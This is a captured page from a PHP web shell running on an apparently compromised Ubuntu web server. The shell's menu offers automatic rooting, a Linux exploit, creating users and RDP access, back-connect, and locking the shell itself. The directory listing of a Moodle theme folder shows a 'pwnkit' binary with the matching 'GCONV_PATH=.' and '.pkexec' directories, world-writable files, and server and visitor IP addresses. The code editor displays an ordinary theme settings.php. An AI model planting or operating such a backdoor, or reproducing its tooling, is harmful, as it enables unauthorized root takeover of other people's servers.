Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
theme /
magazine /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxrwxrwx
layout
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
pix_core
[ DIR ]
drwxrwxrwx
style
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
config.php
6.62
KB
-rwxrwxrwx
lib.php
4.69
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
settings.php
3.86
KB
-rwxrwxrwx
version.php
1.21
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : settings.php
<?php defined('MOODLE_INTERNAL') || die; if ($ADMIN->fulltree) { // Background image setting $name = 'theme_magazine/background'; $title = get_string('background','theme_magazine'); $description = get_string('backgrounddesc', 'theme_magazine'); $setting = new admin_setting_configtext($name, $title, $description, '', PARAM_URL); $setting->set_updatedcallback('theme_reset_all_caches'); $settings->add($setting); // logo image setting $name = 'theme_magazine/logo'; $title = get_string('logo','theme_magazine'); $description = get_string('logodesc', 'theme_magazine'); $setting = new admin_setting_configtext($name, $title, $description, '', PARAM_URL); $setting->set_updatedcallback('theme_reset_all_caches'); $settings->add($setting); // link color setting $name = 'theme_magazine/linkcolor'; $title = get_string('linkcolor','theme_magazine'); $description = get_string('linkcolordesc', 'theme_magazine'); $default = '#32529a'; $previewconfig = NULL; $setting = new admin_setting_configcolourpicker($name, $title, $description, $default, $previewconfig); $setting->set_updatedcallback('theme_reset_all_caches'); $settings->add($setting); // link hover color setting $name = 'theme_magazine/linkhover'; $title = get_string('linkhover','theme_magazine'); $description = get_string('linkhoverdesc', 'theme_magazine'); $default = '#4e2300'; $previewconfig = NULL; $setting = new admin_setting_configcolourpicker($name, $title, $description, $default, $previewconfig); $setting->set_updatedcallback('theme_reset_all_caches'); $settings->add($setting); // main color setting $name = 'theme_magazine/maincolor'; $title = get_string('maincolor','theme_magazine'); $description = get_string('maincolordesc', 'theme_magazine'); $default = '#002f2f'; $previewconfig = NULL; $setting = new admin_setting_configcolourpicker($name, $title, $description, $default, $previewconfig); $setting->set_updatedcallback('theme_reset_all_caches'); $settings->add($setting); // main color accent setting $name = 'theme_magazine/maincoloraccent'; $title = get_string('maincoloraccent','theme_magazine'); $description = get_string('maincoloraccentdesc', 'theme_magazine'); $default = '#092323'; $previewconfig = NULL; $setting = new admin_setting_configcolourpicker($name, $title, $description, $default, $previewconfig); $setting->set_updatedcallback('theme_reset_all_caches'); $settings->add($setting); // heading color setting $name = 'theme_magazine/headingcolor'; $title = get_string('headingcolor','theme_magazine'); $description = get_string('headingcolordesc', 'theme_magazine'); $default = '#4e0000'; $previewconfig = NULL; $setting = new admin_setting_configcolourpicker($name, $title, $description, $default, $previewconfig); $setting->set_updatedcallback('theme_reset_all_caches'); $settings->add($setting); // block heading color setting $name = 'theme_magazine/blockcolor'; $title = get_string('blockcolor','theme_magazine'); $description = get_string('blockcolordesc', 'theme_magazine'); $default = '#002f2f'; $previewconfig = NULL; $setting = new admin_setting_configcolourpicker($name, $title, $description, $default, $previewconfig); $setting->set_updatedcallback('theme_reset_all_caches'); $settings->add($setting); // forum subject background color setting $name = 'theme_magazine/forumback'; $title = get_string('forumback','theme_magazine'); $description = get_string('forumbackdesc', 'theme_magazine'); $default = '#e6e2af'; $previewconfig = NULL; $setting = new admin_setting_configcolourpicker($name, $title, $description, $default, $previewconfig); $setting->set_updatedcallback('theme_reset_all_caches'); $settings->add($setting); }
Close